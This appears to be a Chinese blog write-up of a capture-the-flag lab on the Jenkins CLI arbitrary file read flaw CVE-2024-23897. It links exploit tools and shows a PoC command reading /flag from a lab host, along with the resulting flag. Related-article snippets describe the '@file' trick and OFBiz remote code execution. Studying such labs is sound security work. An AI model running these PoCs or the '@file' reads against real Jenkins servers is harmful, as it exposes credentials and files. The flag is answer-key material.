【春秋云境】CVE-2024-23897

最新推荐文章于 2025-04-02 11:02:13 发布
最新推荐文章于 2025-04-02 11:02:13 发布
阅读量655 收藏 4
点赞数 12
分类专栏: WEB 安全测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_49064458/article/details/143305006
版权

CVE-2024-23897

  • Jenkins任意文件读取

靶标介绍

Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中’@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。

1

漏洞利用

  1. 使用集成工具
https://github.com/TheBeastofwar/JenkinsExploit-GUI

2
2. POC下载
直接下载编译好的二进制文件

Linux:
https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_linux_amd64.zip
Window:
https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip
其他系统Release:
https://github.com/wjlin0/CVE-2024-23897/releases/tag/v1.0.1

CVE-2024-23897.exe -u http://39.106.48.123:41922/ -a /flag

Flag:

flag{3b62b38e-b5c2-4826-8b48-3521c26097ae}

参考文章

https://blog.youkuaiyun.com/HMX404/article/details/142487936
https://www.cnblogs.com/thebeastofwar/p/17991690

网络安全】Jenkins任意文件读取漏洞及检测工具(CVE-2024-23897)
等风来
09-06 2379
Jenkins CLI 接口存在任意文件读取漏洞(CVE-2024-23897)。该问题源于 args4j 库在解析文件名参数时,会将@符号后的字符串视为文件名并尝试读取文件,而且该功能默认处于启用状态。
CVE-2024-23897:Jenkins文件读取漏洞复现分析 [附POC]
薛定谔嘚喵博客
02-05 1484
Jenkins 有一个内置的命令行界面CLI,在处理 CLI 命令时Jenkins 使用args4j 库解析 Jenkins 控制器上的命令参数和选项。此命令解析器具有一个功能,可以将@参数中后跟文件路径的字符替换为文件内容 。
春秋CVE-2024-23897-Jenkins 2.441之前版本存在任意文件读取漏洞
HMX404的博客
09-24 913
Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中’@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。
春秋CVE-2024-23897
weixin_51588494的博客
09-08 1321
Jenkins提供了一个命令行接口,用户可以通过jenkins-cli.jar调用这个接口来执行一些jenkins的功能,但是由于使用jenkins-cli.jar执行命令行时,命令行是在服务端调用第三方库 args4j 进行解析的,如果参数是以@开头,就会被认为是一个文件名,并且的将文件内容读取出来作为参数,然后引发报错,将文件内容通过报错显示出来,造成了文件读取。猜测使用java -jar jenkins-cli.jar -s http://xxx/ -http help 1 "@/flag"
Jenkins任意文件读取漏洞复现(CVE-2024-23897)
最新发布
m0_74125616的博客
04-02 420
3、根据靶场的路径编写命令,我这里的路径是 http://39.106.48.123:45277。2、下载编译好的二进制文件,我用的时window的。4、成功获取到flag。
[CVE-2024-23897]Jenkins CLI 任意文件读取漏洞导致远程代码执行漏洞
whoami
01-26 4584
Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容,攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合 Resource Root URL、Remember me cookie、存储型 XSS 或 CSRF 等在 Jenkins 控制器中执行任意代码。Jenkins CLI 是 Jenkins 内置的命令行页面。
【漏洞复现】Jenkins文件读取漏洞(CVE-2024-23897
2301_80127209的博客
06-18 6991
jenkins是啥?简单理解就是:一个开源的、用于方便代码管理、部署的基于web的平台,用于提高团队开发效率(生产力)。Jenkins CLI 任意文件读取漏洞 CVE-2024-23897 是怎么回事?
CVE-2024-23897春秋镜)
sinat_25635183的博客
10-25 1223
本来是一个很常见的功能,但设计中神奇的是,用户使用jenkins-cli.jar时,命令行是传到服务端解析的,而不是在jenkins-cli.jar里解析。我很乐意提供有关渗透测试的信息,但我必须强调,渗透测试是一项合法且专业的活动,必须在适当的授权和监督下进行。渗透测试需要专业的技能和严格的合规性,以确保不会对系统的安全性造成负面影响。2、根据前面的知识介绍,这里利用一个比较简便的方法,就是直接下载编译好的二进制 文件,我下载的是Windows版本的(从github上面去获取,其他版本的也有)。
Jenkins:CVE-2024-23897[任意文件读取]
h1008685的博客
08-08 1521
Jenkins:CVE-2024-23897漏洞利用,poc工具使用
春秋 CVE-2022-4230 夺旗
05-02
### 春秋 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)
0xSec
09-06 1430
2024年9月,互联网上披露了Apache OFBiz 远程代码执行漏洞(CVE-2024-45195),该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
Apache OFBiz 路径遍历导致RCE漏洞复现(CVE-2024-36104)
0xSec
06-04 2570
Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径(请求URL中的特殊字符(如 ;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。
CVE-2024-45195漏洞复现并反弹shell(Apache OFBiz 未授权远程代码执行漏洞)
yyytaotao的博客
09-12 1215
本文利用了一个服务器来远程代码执行并反弹shell.
CVE-2024-36104 Apache OFBiz路径遍历RCE漏洞复现(附POC)
mashiro_hibiki的博客
06-05 2237
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。Apache_OFBiz是一套基于通用架构的企业应用程序,使用通用数据,逻辑和流程组件。
CVE-2024-23897 Jenkins 任意文件读取漏洞
LJQClqjc的博客
01-26 3501
Jenkins 有一个内置的命令行界面CLI,在处理 CLI 命令时Jenkins 使用args4j 库解析 Jenkins 控制器上的命令参数和选项。此命令解析器具有一个功能,可以将@参数中后跟文件路径的字符替换为文件内容 ( expandAtFiles)。根据Jenkins 官方描述,具有Overall/Read权限的攻击者可以读取整个文件,未授权的攻击者仅能读取文件前几行内容。攻击者可以通过读取jenkins文件获取相关密钥从而实现命令执行。
Jenkins CLI 任意文件读取漏洞复现(CVE-2024-23897)
0xSec
01-26 3133
Jenkins是一个开源CI/CD工具,用于自动化开发流程,包括构建、测试和部署软件。 2024年1月,互联网公开了一个Jenkins的任意文件读取漏洞。鉴于该漏洞易于利用,存在危害扩大的风险,且该系统数据较为敏感且影响范围广泛,建议所有使用Jenkins的企业尽快进行修复,以确保系统安全。
推荐:利用CVE-2024-23897深入理解Jenkins安全漏洞与防护实践
gitblog_00097的博客
06-04 708
推荐:利用CVE-2024-23897深入理解Jenkins安全漏洞与防护实践 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 该项目名为CVE-2024-23897,专注于揭示Jenkins中一个严重的任意文件读取漏洞,该漏洞可能导致远程代码执行(RCE)。这个开源工具旨在帮助系统管理员和安全研究人员检测并修复Jenkins实例上的潜在安全问题,提供了一个Pyth...
【漏洞复现】Jenkins CLI 任意文件读取漏洞(CVE-2024-23897
qq_38073067的博客
01-30 2361
【漏洞复现】Jenkins CLI 任意文件读取漏洞(CVE-2024-23897
春秋CVE-2023-33440
01-12
### 关于春秋 CVE-2023-33440 漏洞详情 对于CVE-2023-33440,在当前提供的参考资料中并未直接提及此特定编号的漏洞细节。然而,基于以往处理类似安全事件的经验以及Apache Struts项目的安全公告模式[^1],可以推测这类CVE通常涉及Web应用程序框架中存在的某种形式的安全缺陷。 针对未具体说明的CVE编号,建议采取以下通用措施来应对潜在风险: #### 一、漏洞影响范围 此类漏洞可能会影响使用了受影响版本组件的应用程序,特别是那些依赖于特定功能实现的部分。例如,在之前的案例中提到的不同类型的Struts2漏洞均涉及到不同场景下的远程代码执行可能性或文件操作不当等问题[^2][^3][^4]。 #### 二、修复方案概述 为了有效缓解并最终解决由CVE-2023-33440引起的风险,应当遵循官方发布的最新指南进行更新或打补丁。一般情况下,这包括但不限于以下几个方面: - **及时升级软件**:确保所使用的Apache Struts库是最新的稳定版。 - **审查现有配置**:检查应用服务器上的所有设置是否符合最佳实践标准,尤其是与安全性有关的部分。 - **强化输入验证机制**:加强对用户提交数据的有效性和合法性校验,防止恶意构造的数据触发漏洞。 - **监控异常行为**:部署日志审计工具和服务端防护产品,以便快速发现任何可疑活动。 由于缺乏具体的漏洞描述和技术分析文档作为依据,上述内容仅能作为一个大致方向指导。强烈推荐查阅来自权威渠道的第一手资料获取最准确的信息。 ```bash # 假设存在一个命令用于查询最新的安全通告 curl https://struts.apache.org/security.html | grep "CVE-2023-33440" ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值